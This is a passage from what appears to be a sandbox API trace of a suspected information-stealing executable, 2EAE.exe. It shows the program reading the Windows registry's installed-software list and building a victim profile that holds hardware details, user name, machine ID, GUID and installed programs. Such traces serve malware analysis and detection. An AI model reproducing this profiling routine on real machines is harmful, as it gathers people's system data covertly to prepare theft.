Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n" [0175.868] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fdc | out: phkResult=0x197fdc*=0x358) returned 0x0 [0175.868] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x0, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.868] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook") returned 63 [0175.868] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.868] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.868] RegCloseKey (hKey=0x354) returned 0x0 [0175.868] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.868] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager") returned 70 [0175.869] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.869] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.869] RegCloseKey (hKey=0x354) returned 0x0 [0175.869] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.869] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx") returned 64 [0175.869] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.869] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.869] RegCloseKey (hKey=0x354) returned 0x0 [0175.869] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x3, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.869] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime") returned 63 [0175.869] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.869] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.869] RegCloseKey (hKey=0x354) returned 0x0 [0175.872] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x4, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.872] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore") returned 60 [0175.872] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.872] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.872] RegCloseKey (hKey=0x354) returned 0x0 [0175.872] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x5, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.872] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40") returned 56 [0175.872] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.872] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.872] RegCloseKey (hKey=0x354) returned 0x0 [0175.872] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x6, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.872] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data") returned 59 [0175.872] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.872] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.872] RegCloseKey (hKey=0x354) returned 0x0 [0175.872] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x7, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.873] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX") returned 60 [0175.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.873] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.873] RegCloseKey (hKey=0x354) returned 0x0 [0175.873] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x8, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.873] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData") returned 58 [0175.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.873] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.873] RegCloseKey (hKey=0x354) returned 0x0 [0175.873] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x9, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.873] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack") returned 68 [0175.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.873] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.873] RegCloseKey (hKey=0x354) returned 0x0 [0175.873] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xa, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.873] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2") returned 60 [0175.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.874] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x4, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.874] RegCloseKey (hKey=0x354) returned 0x0 [0175.874] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xb, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office16.PROPLUS", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.874] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Office16.PROPLUS") returned 68 [0175.874] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Office16.PROPLUS", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.874] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Professional Plus 2016", lpcbData=0x197fd4*=0x28) returned 0x0 [0175.874] lstrlenA (lpString="Microsoft Office Professional Plus 2016") returned 39 [0175.874] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n", lpString2="Microsoft Office Professional Plus 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016" [0175.874] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.874] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 " [0175.874] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001" [0175.874] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n" [0175.874] RegCloseKey (hKey=0x354) returned 0x0 [0175.874] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xc, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.874] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent") returned 67 [0175.874] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.874] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.874] RegCloseKey (hKey=0x354) returned 0x0 [0175.875] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xd, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.875] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC") returned 55 [0175.875] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.875] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.875] RegCloseKey (hKey=0x354) returned 0x0 [0175.875] RegEnumKeyExA (in: hKey=0x358, dwIndex=0xe, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.875] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}") returned 90 [0175.875] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.875] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x197fd4*=0x3f) returned 0x0 [0175.875] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned 62 [0175.875] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n", lpString2="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: 